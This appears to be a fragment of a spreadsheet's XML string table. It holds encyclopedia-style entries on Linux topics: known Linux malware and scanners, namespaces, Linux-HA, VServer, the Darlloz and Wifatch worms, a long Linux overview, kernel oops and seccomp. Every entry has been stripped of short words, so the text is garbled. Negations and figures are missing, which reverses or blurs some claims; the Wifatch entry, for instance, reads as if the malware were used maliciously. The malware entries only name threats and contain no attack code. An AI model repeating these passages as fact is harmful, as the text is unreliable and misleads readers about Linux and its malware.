attacks industries supporting covid-19 response efforts double point ""cybercriminals accelerate linux malware with increase linux-related malware families past year, 500% increase go-written malware first months 2020, attackers accelerating migration linux malware, easily various platforms, including cloud environments."" that cybercriminals increasingly using linux unix target hospitals allied industries (that rely systems cloud networks) increasingly vulnerable covid-19 crisis, cross cyberattack. anti-virus applications there number anti-virus applications available linux operating system. most applications looking exploits could affect users microsoft windows. microsoft windows-specific threats these applications useful computers (typically, servers) pass files windows users. they look linux-specific threats. linux-specific threats these applications look actual threats linux computers running. chkrootkit (free open source software) clamav (free open source software) comodo (proprietary) dr.web (proprietary) eset (proprietary) (detects windows malware well) linux malware detect lynis (open source auditing) rkhunter (free open source software) samhain (free open source software) sophos (proprietary) (versions unix windows too)linux malware also detected (and analyzed) using memory forensics tools, forcepoint (proprietary) volatility (free open source software) threats following partial list known linux malware. however, wild, rendered obsolete linux updates never threat. known malware even important threat: malware attacks directed specific sites vulnerabilities previously unknown community unused malware. botnets mayhem 32/64-bit linux/freebsd multifunctional botnet linux.remaiten threat targeting internet things. mirai (malware) ddos botnet spreads telnet service designed infect internet things (iot). gafgyt/bashlite/qbot ddos botnet spreads telnet service weak passwords, firstly discovered bash shellshock vulnerability. luabot botnet coded modules component programming language, cross-compiled wrapper libc, aims internet things arm, mips architectures, usage ddos, spreads mirai (malware) selling proxy access cyber crime. hydra, aidra, lightaidra newaidra another form powerful botnet infects linux boxes. energymech overkill (linux/overkill) long last botnet designed infect servers operated protocol ddos spreading purpose. ransomware rootkits snakso 64-bit linux webserver rootkit trojans viruses worms also botnet comparison computer viruses computer virus computer worm dirty ransomware spyware timeline computer viruses worms trojan horse (computing) references external links linuxvirus official ubuntu documentation</t>
  </si>
  <si>
    <t>Linux namespaces</t>
  </si>
  <si>
    <t>namespaces feature linux kernel partitions kernel resources processes sees resources another processes sees different resources. feature works namespace resources processes, namespaces refer distinct resources. resources exist multiple spaces. examples resources process ids, hostnames, user ids, file names, names associated network access, interprocess communication. namespaces fundamental aspect containers linux. term "namespace" often used type namespace (e.g. process well particular space names. linux system starts single namespace type, used processes. processes create additional namespaces join different namespaces. history linux namespaces inspired wider namespace functionality used heavily throughout plan bell labs.the linux namespaces originated 2002 2.4.19 kernel work mount namespace kind. additional namespaces added beginning 2006 continuing future. adequate containers support functionality finished kernel version introduction user namespaces. namespace kinds since kernel version 5.6, kinds namespaces. namespace functionality across kinds: process associated namespace resources associated namespace, descendant namespaces applicable. this process process group thereof) unique view resources. which resource isolated depends kind namespace created given process group. mount (mnt) mount namespaces control mount points. upon creation mounts current mount namespace copied namespace, mount points created afterwards propagate namespaces (using shared subtrees, possible propagate mount points namespaces). clone flag used create namespace type clone_newns short "new namespace". this term descriptive tell kind namespace created) mount namespaces first kind namespace designers anticipate others. process (pid) namespace provides processes independent process (pids) namespaces. namespaces nested, meaning process created namespace current namespace initial namespace. hence initial namespace able processes, albeit different pids namespaces processes with. first process created namespace assigned process number receives special treatment normal init process, notably orphaned processes within namespace attached this also means termination process immediately terminate processes namespace descendants. network (net) network namespaces virtualize network stack. creation network namespace contains loopback interface. each network interface (physical virtual) present exactly namespace moved namespaces. each namespace private addresses, routing table, socket listing, connection tracking table, firewall, network-related resources. destroying network namespace destroys virtual interfaces within moves physical interfaces within back initial network namespace. interprocess communication (ipc) namespaces isolate processes sysv style inter-process communication. this prevents processes different namespaces using, example, family functions establish range shared memory processes. instead process able identifiers shared memory region produce distinct regions. (unix time-sharing) namespaces allow single system appear different host domain names different processes. "when process creates namespace hostname domain namespace copied corresponding values caller's namespace." user (user) user namespaces feature provide privilege isolation user identification segregation across multiple sets processes available since kernel 3.8. with administrative assistance possible build container seeming administrative rights without actually giving elevated privileges user processes. like namespace, user namespaces nested user namespace considered child user namespace created user namespace contains mapping table converting user container's point view system's point view. this allows, example, root user user container actually treated user 1,400,000 system ownership checks. similar table used group mappings ownership checks. facilitate privilege isolation administrative actions, namespace type considered owned user namespace based active user namespace moment creation. user administrative privileges appropriate user namespace allowed perform administrative actions within namespace type. example, process administrative permission change address network interface, long user namespace ancestor user namespace owns network namespace. hence initial user namespace administrative control namespace types system. control group (cgroup) namespace cgroup namespace type hides identity control group process member. process namespace, checking control group process part would path actually relative control group creation time, hiding true control group position identity. this namespace type existed since march 2016 linux 4.6. time namespace time namespace allows processes different system times similar namespace. proposed 2018 landed linux 5.6, released march 2020. proposed namespaces syslog namespace syslog namespace proposed xiang, engineer huawei, merged linux kernel. systemd implemented similar feature called “journal namespace” february 2020. implementation details kernel assigns process symbolic link namespace kind /proc/&lt;pid&gt;/ns/. inode number pointed symlink process namespace. this uniquely identifies namespace inode number pointed symlinks. reading symlink readlink returns string containing namespace kind name inode number namespace. syscalls three syscalls directly manipulate namespaces: clone, flags specify namespace process migrated unshare, allows process thread) disassociate parts execution context currently shared processes threads) setns, enters namespace specified file descriptor. destruction namespace longer referenced, deleted, handling contained resource depends namespace kind. namespaces referenced three ways: process belonging namespace open filedescriptor namespace's file (/proc/&lt;pid&gt;/ns/&lt;ns-kind&gt;) bind mount namespace's file (/proc/&lt;pid&gt;/ns/&lt;ns-kind&gt;) adoption various container software linux namespaces combination cgroups isolate processes, including docker lxc. other applications, google chrome make namespaces isolate processes risk attack internet.there also unshare wrapper util-linux. example references external links namespaces manpage namespaces linux kernel documentation linux kernel namespaces cgroups rami rosen namespaces cgroups, basis linux containers (including cgroups slides talk rami rosen, netdev 1.1, seville, spain (2016) containers namespaces linux kernel kolyshkin https://medium.com/@teddyking/linux-namespaces-850489d3ccf https://medium.com/@teddyking/namespaces-in-go-basics-e3f0fc1ff69a https://medium.com/@teddyking/namespaces-in-go-user-a54ef9476f2a https://medium.com/@teddyking/namespaces-in-go-reexec-3d1295b91af8 https://medium.com/@teddyking/namespaces-in-go-mount-e4c04fe9fb29 https://medium.com/@teddyking/namespaces-in-go-network-fdcf63e76100 https://medium.com/@teddyking/namespaces-in-go-uts-d47aebcdf00e</t>
  </si>
  <si>
    <t>Linux-HA</t>
  </si>
  <si>
    <t>linux-ha (high-availability linux) project provides high-availability (clustering) solution linux, freebsd, openbsd, solaris promotes reliability, availability, serviceability (ras).the project's main software product heartbeat, gpl-licensed portable cluster management program high-availability clustering. important features are: fixed maximum number nodes heartbeat used build large clusters well simple ones resource monitoring: resources automatically restarted moved another node failure fencing mechanism remove failed nodes cluster sophisticated policy-based resource management, resource inter-dependencies constraints time-based rules allow different policies depending time several resource scripts (for apache, db2, oracle, postgresql etc.) included configuring, controlling monitoring resources nodes history project originated mailing list started november 1997. eventually harald milz wrote sort linux-ha howto. unlike howtos, configure existing software, collection techniques could write software linux. alan robertson inspired description thought could perhaps write software project sort initial seed crystal help jump start project. initial software running march 1998. created first site project october 1998, first version software released november 1998. first production customer software rudy pawul iso-ne. iso-ne site went production second half 1999. point, project limited nodes simple takeover semantics, resource monitoring.this cured version software, added n-node clusters, resource monitoring, dependencies, policies. version 2.0.0 came july 2005. this release represented another important milestone first version large contributions terms code size) made linux-ha community large. this series releases brought project level feature parity-or-superiority respect commercial software. after version 2.1.4, cluster resource manager component (responsible starting stopping resources monitoring resource node failure) split separate project called pacemaker, resource agents "glue" infrastructure moved separate packages. thus version series, name heartbeat used cluster messaging layer only. also carrier grade linux high-availability cluster open cluster framework notes references pfister, gregory (1998). search clusters (2nd ed.). upper saddle river, prentice hall. isbn 0-13-899709-8. marcus, evan; stern, (2003). blueprints high availability (2nd ed.). indianapolis, john wiley sons. isbn 0-471-43026-9. external links linux-ha website linux-ha fact sheet provides detailed list features archives linux-ha's main mailing list pacemaker website</t>
  </si>
  <si>
    <t>Linux-VServer</t>
  </si>
  <si>
    <t>linux-vserver virtual private server implementation created adding operating system-level virtualization capabilities linux kernel. developed distributed open-source software. project started jacques gélinas. maintained herbert pötzl. related linux virtual server project, implements network load balancing. linux-vserver jail mechanism used securely partition resources computer system (such file system, time, network addresses memory) processes cannot mount denial-of-service attack anything outside partition. each partition called security context, virtualized system within virtual private server. chroot-like utility descending security contexts provided. booting virtual private server simply matter kickstarting init security context; likewise, shutting simply entails killing processes security context. contexts robust enough boot many linux distributions unmodified, including debian fedora. virtual private servers commonly used hosting services, useful segregating customer accounts, pooling resources containing potential security breaches. save space installations, virtual server's file system created tree copy-on-write hard links "template" file system. hard link marked special filesystem attribute modified, securely transparently replaced real copy file. linux-vserver provides branches, stable (2.2.x), devel (2.3.x) 2.6-series kernels single stable branch 2.4-series. separate stable branch integrating grsecurity patch also available. advantages virtual servers share system call interface emulation overhead. virtual servers backed opaque disk images, share common file system common sets files (through copy-on-write hard links). this makes easier back system pool disk space amongst virtual servers. processes within virtual server regular processes host system. this somewhat memory-efficient i/o-efficient whole-system emulation, although memory ballooning modern allow returning unused memory sharing disk cache host virtual servers. processes within virtual server queued scheduler host, allowing guest's processes concurrently systems. this trivial implement whole-system emulation. networking based isolation rather virtualization, additional overhead packets. smaller plane security bugs. only kernel small additional code-base compared kernels large interfaces them. rich linux scheduling features real-time priorities. disadvantages requires host kernel patched. clustering process migration capability included, host kernel host computer still single point failure virtual servers. networking based isolation, virtualization. this prevents virtual server creating internal routing firewalling setup. some system calls (mostly hardware-related: e.g. real-time clock) parts /proc /sys filesystems left unvirtualized. does allow disk bandwidth allocated per-virtual server basis. also comparison platform virtualization software operating system-level virtualization external links official website official releases implementation paper</t>
  </si>
  <si>
    <t>Linux.Darlloz</t>
  </si>
  <si>
    <t>linux.darlloz worm infects linux embedded systems.linux.darlloz first discovered symantec 2013. linux.darlloz targets internet things infects routers, security cameras, set-top boxes exploiting vulnerability.the worm based proof concept code released october 2013. linux.darlloz utilizes vulnerability (cve-2012-1823) exploit systems order compromise systems.linux.darlloz later found march 2014 started mining crypto currencies mincoin dogecoin. also botnet mirai (malware) bashlite remaiten linux.wifatch hajime (malware) references</t>
  </si>
  <si>
    <t>Linux.Wifatch</t>
  </si>
  <si>
    <t>linux.wifatch open-source piece malware noted used malicious actions, instead attempting secure devices malware.linux.wifatch operates manner similar computer security system updates definitions peer peer network deletes remnants malware remain.linux.wifatch active since least november 2014. according authors idea linux.wifatch came reading carna paper. linux.wifatch later released gitlab authors general public license october 2015. operatiion linux.wifatch's primary mode infection logging devices using weak default telnet credentials. once infected, linux.wifatch removes malware disables telnet access, replacing message "telnet closed avoid infection device. please disable telnet, change telnet passwords, and/or update firmware." also denial-of-service attack bashlite another notable malware linux.darlloz another notable malware remaiten another notable malware mirai another notable malware hajime (malware) malware appears similar purpose wifatch references external links linux.wifatch gitlab</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>linux (listen) lee-nuuks lin-uuks) family open-source unix-like operating systems based linux kernel, operating system kernel first released september 1991, linus torvalds. linux typically packaged linux distribution. distributions include linux kernel supporting system software libraries, many provided project. many linux distributions word "linux" name, free software foundation uses name "gnu/linux" emphasize importance software, causing controversy.popular linux distributions include debian, fedora linux, ubuntu, many different distributions modifications, including lubuntu xubuntu. commercial distributions include enterprise linux suse linux enterprise. desktop linux distributions include windowing system wayland, desktop environment gnome plasma. distributions intended servers omit graphics altogether, include solution stack lamp. because linux freely redistributable, anyone create distribution purpose.linux originally developed personal computers based intel architecture, since ported platforms operating system. because dominance linux-based android smartphones, linux, including android, largest installed base general-purpose operating systems, 2022. although linux 2022, used around percent desktop computers, chromebook, runs linux kernel-based chrome dominates k–12 education market represents nearly percent sub-$300 notebook sales linux leading operating system servers (over 96.4% million servers' operating systems linux), leads iron systems mainframe computers, used top500 supercomputers (since november 2017, gradually eliminated competitors).linux also runs embedded systems, i.e. devices whose operating system typically built firmware highly tailored system. this includes routers, automation controls, smart home devices, cameras, video game consoles, televisions (samsung smart tizen webos, respectively), automobiles (tesla, audi, mercedes-benz, hyundai, toyota rely linux), spacecraft (falcon dragon avionics customized version linux), rovers (the mars 2020 mission carried linux computers mars including ingenuity helicopter). linux prominent examples free open-source software collaboration. source code used, modified distributed commercially non-commercially anyone terms respective licenses, general public license (gpl). linux kernel, example, licensed gplv2, special exception system calls, without system call exception program calling kernel would considered derivative therefore would apply program. history precursors unix operating system conceived implemented 1969, at&amp;t's bell labs, united states thompson, dennis ritchie, douglas mcilroy, ossanna. first released 1971, unix written entirely assembly language, common practice time. 1973, pioneering approach, rewritten programming language dennis ritchie (with exception hardware routines). availability high-level language implementation unix made porting different computer platforms easier.due earlier antitrust case forbidding entering computer business, at&amp;t licensed operating system's source code trade secret anyone asked. result, unix grew quickly became widely adopted academic institutions businesses. 1984, at&amp;t divested regional operating companies, released obligation enter computer business; freed obligation, bell labs began selling unix proprietary product, users legally allowed modify it.onyx systems began selling early microcomputer-based unix workstations 1980. later, microsystems, founded spin-off student project stanford university, also began selling unix-based desktop workstations 1982. while workstations utilize commodity hardware like linux later developed for, represented first successful commercial attempt distributing primarily single-user microcomputer unix operating system.with unix increasingly "locked proprietary product, project, started 1983 richard stallman, goal creating "complete unix-compatible software system" composed entirely free software. work began 1984. later, 1985, stallman started free software foundation wrote general public license (gnu gpl) 1989. early 1990s, many programs required operating system (such libraries, compilers, text editors, command-line shell, windowing system) completed, although low-level elements device drivers, daemons, kernel, called hurd, stalled incomplete.minix created andrew tanenbaum, computer science professor, released 1987 minimal unix-like operating system targeted students others wanted learn operating system principles. although complete source code minix freely available, licensing terms prevented free software licensing changed april 2000.although released 1992, legal complications, development 386bsd, netbsd, openbsd freebsd descended, predated linux. linus torvalds stated separate occasions kernel 386bsd available time (1991), probably would created linux. creation while attending university helsinki fall 1990, torvalds enrolled unix course. course utilized microvax minicomputer running ultrix, required texts operating systems: design implementation andrew tanenbaum. this textbook included copy tanenbaum's minix operating system. course torvalds first became exposed unix. 1991, became curious operating systems. frustrated licensing minix, time limited educational only, began work operating system kernel, eventually became linux kernel. torvalds began development linux kernel minix applications written minix also used linux. later, linux matured linux kernel development took place linux systems. applications also replaced minix components, advantageous freely available code project fledgling operating system; code licensed reused computer programs long also released compatible license. torvalds initiated switch original license, prohibited commercial redistribution, gpl. developers worked integrate components linux kernel, creating fully functional free operating system. naming linus torvalds wanted call invention "freax", portmanteau "free", "freak", allusion unix). during start work system, project's makefiles included name "freax" half year. initially, torvalds considered name "linux" dismissed egotistical.to facilitate development, files uploaded server (ftp.funet.fi) funet september 1991. lemmke, torvalds' coworker helsinki university technology (hut) volunteer administrators server time, think "freax" good name, named project "linux" server without consulting torvalds. later, however, torvalds consented "linux". according newsgroup post torvalds, word "linux" pronounced (listen) lin-uuks) short 'print' 'put'. demonstrate word "linux" pronounced, included audio guide (listen kernel source code. however, recording, pronounces 'linux' (listen) leen-uuks) short close front unrounded vowel. commercial popular uptake adoption linux production environments, rather used hobbyists, started take first mid-1990s supercomputing community, organizations nasa started replace increasingly expensive machines clusters inexpensive commodity computers running linux. commercial began dell ibm, followed hewlett-packard, started offering linux support escape microsoft's monopoly desktop operating system market.today, linux systems used throughout computing, embedded systems virtually supercomputers, secured place server installations popular lamp application stack. linux distributions home enterprise desktops growing. linux distributions also become popular netbook market, many devices shipping customized linux distributions installed, google releasing chrome designed netbooks. linux's greatest success consumer market perhaps mobile device market, android dominant operating system smartphones popular tablets and, recently, wearables. linux gaming also rise valve showing support linux rolling steamos, gaming-oriented linux distribution. linux distributions also gained popularity various local national governments, federal government brazil. current development greg kroah-hartman lead maintainer linux kernel guides development. william john sullivan executive director free software foundation, turn supports components. finally, individuals corporations develop third-party non-gnu components. these third-party components comprise vast body work include kernel modules user applications libraries. linux vendors communities combine distribute kernel, components, non-gnu components, additional package management software form linux distributions. design many open source developers agree linux kernel designed rather evolved natural selection. torvalds considers although design unix served scaffolding, "linux grew mutations mutations less random, faster directed alpha-particles dna." eric raymond considers linux's revolutionary aspects social, technical: linux, complex software designed carefully small groups, "linux evolved completely different way. from nearly beginning, rather casually hacked huge numbers volunteers coordinating internet. quality maintained rigid standards autocracy naively simple strategy releasing every week getting feedback hundreds users within days, creating sort rapid darwinian selection mutations introduced developers." bryan cantrill, engineer competing agrees "linux designed, evolved", considers limitation, proposing features, especially related security, cannot evolved into, "this biological system day, software system." linux-based system modular unix-like operating system, deriving much basic design principles established unix 1970s 1980s. such system uses monolithic kernel, linux kernel, handles process control, networking, access peripherals, file systems. device drivers either integrated directly kernel, added modules loaded system running.the userland part systems based linux kernel, android notable exception. project's implementation library works wrapper system calls linux kernel necessary kernel-userspace interface, toolchain broad collection programming tools vital linux development (including compilers used build linux kernel itself), coreutils implement many basic unix tools. project also develops bash, popular shell. graphical user interface gui) used linux systems built implementation window system. more recently, linux community seeks advance wayland display server protocol place x11. many open-source software projects contribute linux systems. installed components linux system include following: bootloader, example grub, lilo, syslinux systemd-boot. this program loads linux kernel computer's main memory, executed computer turned firmware initialization performed. init program, traditional sysvinit newer systemd, openrc upstart. this first process launched linux kernel, root process tree: terms, processes launched init. starts processes system services login prompts (whether graphical terminal mode). software libraries, contain code used running processes. linux systems using elf-format executable files, dynamic linker manages dynamic libraries known ld-linux.so. system user compile software themselves, header files also included describe interface installed libraries. besides commonly used software library linux systems, library (glibc), numerous libraries, mesa. standard library library needed programs computer system, library standard. embedded systems, alternatives musl, eglibc glibc fork used debian) uclibc (which designed uclinux) developed, although last longer maintained. android uses library, bionic. basic unix commands, coreutils standard implementation. alternatives exist embedded systems, copyleft busybox, bsd-licensed toybox. widget toolkits libraries used build graphical user interfaces (guis) software applications. numerous widget toolkits available, including clutter developed gnome project, developed project company, enlightenment foundation libraries (efl) developed primarily enlightenment team. package management system, dpkg rpm. alternatively packages compiled binary source tarballs. user interface programs command shells windowing environments. user interface user interface, also known shell, either command-line interface (cli), graphical user interface (gui), controls attached associated hardware, common embedded systems. desktop systems, default user interface usually graphical, although commonly available terminal emulator windows separate virtual console. shells text-based user interfaces, text input output. dominant shell used linux bourne-again shell (bash), originally developed project. most low-level linux components, including various parts userland, exclusively. particularly suited automation repetitive delayed tasks provides simple inter-process communication. desktop systems, popular user interfaces shells, packaged together extensive desktop environments, plasma, gnome, mate, cinnamon, lxde, pantheon xfce, though variety additional user interfaces exist. most popular user interfaces based window system, often simply called "x". provides network transparency permits graphical application running system displayed another user interact application; however, certain extensions window system capable working network. several display servers exist, reference implementation, x.org server, popular. server distributions might provide command-line interface developers administrators, provide custom interface towards end-users, designed use-case system. this custom interface accessed client resides another system, necessarily linux based. several types window managers exist x11, including tiling, dynamic, stacking compositing. window managers provide means control placement appearance individual application windows, interact window system. simpler window managers dwm, ratpoison, i3wm, herbstluftwm provide minimalist functionality, elaborate window managers fvwm, enlightenment window maker provide features built-in taskbar themes, still lightweight compared desktop environments. desktop environments include window managers part standard installations, mutter (gnome), kwin (kde) xfwm (xfce), although users choose different window manager preferred. wayland display server protocol intended replacement protocol; 2014, received wider adoption. unlike x11, wayland need external window manager compositing manager. therefore, wayland compositor takes role display server, window manager compositing manager. weston reference implementation wayland, gnome's mutter kde's kwin ported wayland standalone display servers. enlightenment already successfully ported since version video input infrastructure linux currently modern kernel-userspace apis handling video input devices: v4l2 video streams radio, digital reception.due complexity diversity different devices, large number formats standards handled apis, infrastructure needs evolve better devices. also, good userspace device library success userspace applications able work formats supported devices. development primary difference linux many popular contemporary operating systems linux kernel components free open-source software. linux operating system, although widely used. some free open-source software licenses based principle copyleft, kind reciprocity: work derived copyleft piece software must also copyleft itself. common free software license, general public license (gpl), form copyleft, used linux kernel many components project.linux-based distributions intended developers interoperability operating systems established computing standards. linux systems adhere posix, sus, lsb, iso, ansi standards possible, although date linux distribution posix.1 certified, linux-ft.free software projects, although developed collaboration, often produced independently other. fact software licenses explicitly permit redistribution, however, provides basis larger-scale projects collect software produced stand-alone projects make available form linux distribution. many linux distributions manage remote collection system software application software packages available download installation network connection. this allows users adapt operating system specific needs. distributions maintained individuals, loose-knit teams, volunteer organizations, commercial entities. distribution responsible default configuration installed linux kernel, general system security, generally integration different software packages coherent whole. distributions typically package manager apt, yum, zypper, pacman portage install, remove, update system's software central location. community distribution largely driven developer user communities. some vendors develop fund distributions volunteer basis, debian well-known example. others maintain community version commercial distributions, fedora, suse opensuse.in many cities regions, local associations known linux user groups (lugs) seek promote preferred distribution extension free software. they hold meetings provide free demonstrations, training, technical support, operating system installation users. many internet communities also provide support linux users developers. most distributions free software open-source projects chatrooms newsgroups. online forums another means support, notable examples linuxquestions.org various distribution specific support community forums, ones ubuntu, fedora, gentoo. linux distributions host mailing lists; commonly specific topic usage development given list. there several technology websites linux focus. print magazines linux often bundle cover disks carry software even complete linux distributions.although linux distributions generally available without charge, several large corporations sell, support, contribute development components system free software. analysis linux kernel 2017 showed well code developed programmers paid work, leaving 8.2% unpaid developers 4.1% unclassified. some major corporations provide contributions include intel, samsung, google, amd, oracle facebook. number corporations, notably hat, canonical suse, built significant business around linux distributions. free software licenses, various software packages distribution built linux kernel based, explicitly accommodate encourage commercialization; relationship linux distribution whole individual vendors seen symbiotic. common business model commercial suppliers charging support, especially business users. number companies also offer specialized business version distribution, adds proprietary support packages tools administer higher numbers installations simplify administrative tasks. another business model give away software sell hardware. this used norm computer industry, operating systems cp/m, apple versions prior freely copyable (but modifiable). computer hardware standardized throughout 1980s, became difficult hardware manufacturers profit tactic, would manufacturer's computer shared architecture. programming linux most programming languages support linux either directly third-party community based ports. original development tools used building linux applications operating system programs found within toolchain, includes compiler collection (gcc) build system. amongst others, provides compilers ada, c++, fortran. many programming languages cross-platform reference implementation supports linux, example php, perl, ruby, python, java, rust haskell. first released 2003, llvm project provides alternative cross-platform open-source compiler many languages. proprietary compilers linux include intel compiler, studio, c/c++ compiler. basic form visual basic supported forms gambas, freebasic, xbasic, terms terminal programming quickbasic turbo basic programming form qb64. common feature unix-like systems, linux includes traditional specific-purpose programming languages targeted scripting, text processing system configuration management general. linux distributions support shell scripts, awk, make. many programs also embedded programming language support configuring programming themselves. example, regular expressions supported programs like grep locate, traditional unix sendmail contains turing complete scripting system, advanced text editor emacs built around general purpose lisp interpreter. most distributions also include support php, perl, ruby, python dynamic languages. while common, linux also supports (via mono), vala, scheme. guile scheme acts extension language targeting system utilities, seeking make conventionally small, static, compiled programs unix design rapidly dynamically extensible elegant, functional high-level scripting system; many programs compiled optional guile bindings end. number java virtual machines development kits linux, including original microsystems (hotspot), ibm's j2se well many open-source projects like kaffe jikesrvm. gnome popular desktop environments provide framework developing applications. these projects based widget toolkits, respectively, also used independently larger framework. both support wide variety languages. there number integrated development environments available including anjuta, code::blocks, codelite, eclipse, geany, activestate komodo, kdevelop, lazarus, monodevelop, netbeans, creator, long-established editors vim, nano emacs remain popular. hardware support linux kernel widely ported operating system kernel, available devices ranging mobile phones supercomputers; runs highly diverse range computer architectures, including hand-held arm-based ipaq mainframes system system z10. specialized distributions kernel forks exist less mainstream architectures; example, elks kernel fork intel 8086 intel 80286 16-bit microprocessors, µclinux kernel fork systems without memory management unit. kernel also runs architectures ever intended manufacturer-created operating system, macintosh computers (with powerpc intel processors), pdas, video game consoles, portable music players, mobile phones. there several industry associations hardware conferences devoted maintaining improving support diverse hardware linux, freedomhec. over time, support different hardware improved linux, resulting off-the-shelf purchase "good chance" compatible.in 2014, initiative launched automatically collect database tested hardware configurations. uses market share uptake many quantitative studies free/open-source software focus topics including market share reliability, numerous studies specifically examining linux. linux market growing, linux operating system market size expected growth 19.2% 2027, reaching $15.64 billion, compared $3.89 billion 2019. analysts proponents attribute relative success linux security, reliability, cost, freedom vendor lock-in. desktops laptops according server statistics (that based numbers recorded visits websites client devices), 2022, estimated market share linux desktop computers around 2.5%. comparison, microsoft windows market share around 75.5%, macos covers around 14.9%.web serversw3cook publishes stats 1,000,000 alexa domains, 2015 estimate 96.55% servers linux, 1.73% windows, 1.72% freebsd.w3techs publishes stats 10,000,000 alexa domains 1,000,000 tranco domains, updated monthly november 2020 estimate linux used servers, versus 21.9% used microsoft windows. 40.1% used types unix.idc's 2007 report indicated linux held 12.7% overall server market time; estimate based number linux servers sold various companies, include server hardware purchased separately linux installed later.mobile devices android, based linux kernel, become dominant operating system smartphones. during second quarter 2013, 79.3% smartphones sold worldwide used android. android also popular operating system tablets, responsible tablet sales 2013. according server statistics, october 2021 android market share 71%, holding 28%, remaining attributed various niche platforms.film production years linux platform choice film industry. first major film produced linux servers 1997's titanic. since major studios including dreamworks animation, pixar, weta digital, industrial light magic migrated linux. according linux movies group, servers desktops large animation visual effects companies linux.use government linux distributions also gained popularity various local national governments. news russian military creating linux distribution also surfaced, come fruition g.h.ost project. indian state kerala gone extent mandating state high schools linux computers. china uses linux exclusively operating system loongson processor family achieve technology independence. spain, regions developed linux distributions, widely used education official institutions, like gnulinex extremadura guadalinex andalusia. france germany also taken steps toward adoption linux. north korea's star developed since 2002, based version fedora linux. copyright, trademark, naming linux kernel licensed general public license (gpl), version requires anyone distributes software based source code license must make originating source code (and modifications) available recipient terms. other components typical linux distribution also mainly licensed gpl, licenses; many libraries lesser general public license (lgpl), permissive variant gpl, x.org implementation window system uses license. torvalds states linux kernel move version version specifically dislikes provisions license prohibit software digital rights management. would also impractical obtain permission copyright holders, number thousands.a 2001 study linux found distribution contained million source lines code. using constructive cost model, study estimated distribution required eight thousand person-years development time. according study, software developed conventional proprietary means, would cost us$1.57 billion develop 2020 united states. most source code (71%) written programming language, many languages used, including c++, lisp, assembly language, perl, python, fortran, various shell scripting languages. slightly half lines code licensed gpl. linux kernel million lines code, total.in later study, analysis performed debian version (etch, released 2007). this distribution contained close million source lines code, study estimated would required seventy three thousand man-years cost us$8.8 billion 2020 dollars) develop conventional means. united states, name linux trademark registered linus torvalds. initially, nobody registered august 1994, william della croce, filed trademark linux, demanded royalties linux distributors. 1996, torvalds affected organizations sued trademark assigned torvalds, and, 1997, case settled. licensing trademark since handled linux mark institute (lmi). torvalds stated trademarked name prevent someone else using originally charged nominal sublicensing linux name part trademarks, later changed favor offering free, perpetual worldwide sublicense.the free software foundation (fsf) prefers gnu/linux name referring operating system whole, considers linux distributions variants operating system initiated 1983 richard stallman, president fsf. they explicitly take issue name android android also operating system based linux kernel, part minority public figures software projects stallman fsf, notably debian (which sponsored 1996), also gnu/linux referring operating system whole. most media common usage, however, refers family operating systems simply linux, many large linux distributions (for example, suse linux enterprise linux). contrast, linux distributions containing free software "gnu/linux" simply "gnu", trisquel gnu/linux, parabola gnu/linux-libre, blag linux gnu, gnewsense. 2011, linux distribution ubuntu made components (the range depending whether gnome considered part gnu), determined counting lines source code making ubuntu's "natty" release; meanwhile, taken linux kernel, increased including direct dependencies. also notes references external links linux curlie graphical linux internals linux kernel website archives history linux repository format 1992–2010</t>
  </si>
  <si>
    <t>Linux kernel oops</t>
  </si>
  <si>
    <t>computing, oops serious non-fatal error linux kernel. oops often precedes kernel panic, cases allow continued operation compromised reliability. term stand anything, simple mistake. functioning when kernel detects problem, kills offending processes prints oops message, linux kernel engineers debugging condition created oops fixing underlying programming error. after system experienced oops, internal resources longer operational. thus, even system appears work correctly, undesirable side effects resulted active task killed. kernel oops often leads kernel panic system attempts resources lost. official linux kernel documentation regarding oops messages resides file documentation/admin-guide/bug-hunting.rst kernel sources. some logger configurations affect ability collect oops messages. kerneloops software collect submit kernel oopses repository www.kerneloops.org website, provides statistics public access reported oopses. person familiar technical details computers operating systems, oops message might look confusing. unlike operating systems windows macos, linux chooses present details explaining crash kernel rather display simplified, user-friendly message, bsod windows. simplified crash screen proposed times, however currently none development. also kdump (linux) linux kernel's crash dump mechanism, internally uses kexec system.map contains mappings symbol names addresses memory, used interpret oopses references further reading linux device drivers, edition, chapter john bradford (2003-03-08). "re: what's oops". lkml (mailing list). archived original 2007-03-10. retrieved 2006-05-22. szakacsits szabolcs (2003-03-08). "re: what's oops". lkml (mailing list). archived original 2007-03-13. retrieved 2006-05-22. viro (2008-01-14). "oops report analysis". lkml (mailing list). archived original 2008-04-21. retrieved 2008-01-14. kernel oops howto (the madwifi project) useful information configuration files tools help display oops messages. also many links.</t>
  </si>
  <si>
    <t>List of Asus routers</t>
  </si>
  <si>
    <t>asustek computer incorporated (asus) manufactures series network routers directly competing linksys routers belkin. asus series routers usually ship broadcom chipsets, faster processors memory average, removable antennas, ports expansion. although asus' factory default firmware generally feature-rich competitors, open source linux-based router firmware projects dd-wrt, openwrt, tomato firmware debwrt able better performance devices offer users flexibility customization options. asus encourages supports advertises several routers particularly suitable dd-wrt including especially rt-n16 gigabit router. details compatibility below. rt-n13u/b, rt-n12, rt-n10+, wl-520gu wl-520gc also advertised dd-wrt compatible though ship operating system. asus wireless routers asus wireless routers asus wireless routers asus wireless routers asus wireless routers also list wireless router firmware projects references external links asus</t>
  </si>
  <si>
    <t>Seccomp</t>
  </si>
  <si>
    <t>seccomp (short secure computing mode) computer security facility linux kernel. seccomp allows process make one-way transition "secure" state cannot make system calls except exit(), sigreturn(), read() write() already-open file descriptors. should attempt system calls, kernel either event terminate process sigkill sigsys. sense, virtualize system's resources isolates process entirely. seccomp mode enabled prctl(2) system call using pr_set_seccomp argument, (since linux kernel 3.17) seccomp(2) system call. seccomp mode used enabled writing file, /proc/self/seccomp, method removed favor prctl(). kernel versions, seccomp disables rdtsc instruction, returns number elapsed processor cycles since power-on, used high-precision timing.seccomp-bpf extension seccomp allows filtering system calls using configurable policy implemented using berkeley packet filter rules. used openssh vsftpd well google chrome/chromium browsers chrome linux. regard seccomp-bpf achieves similar functionality, flexibility higher performance, older systrace—which seems longer supported linux.) some consider seccomp comparable openbsd pledge(2) freebsd capsicum(4). history seccomp first devised andrea arcangeli january 2005 public grid computing originally intended means safely running untrusted compute-bound programs. merged linux kernel mainline kernel version 2.6.12, released march 2005. software using seccomp seccomp-bpf android uses seccomp-bpf filter zygote since android oreo. systemd's sandboxing options based seccomp. qemu, quick emulator, core component modern virtualization together uses seccomp parameter --sandbox docker software allows applications inside isolated containers. docker associate seccomp profile container using --security-opt parameter. arcangeli's cpushare 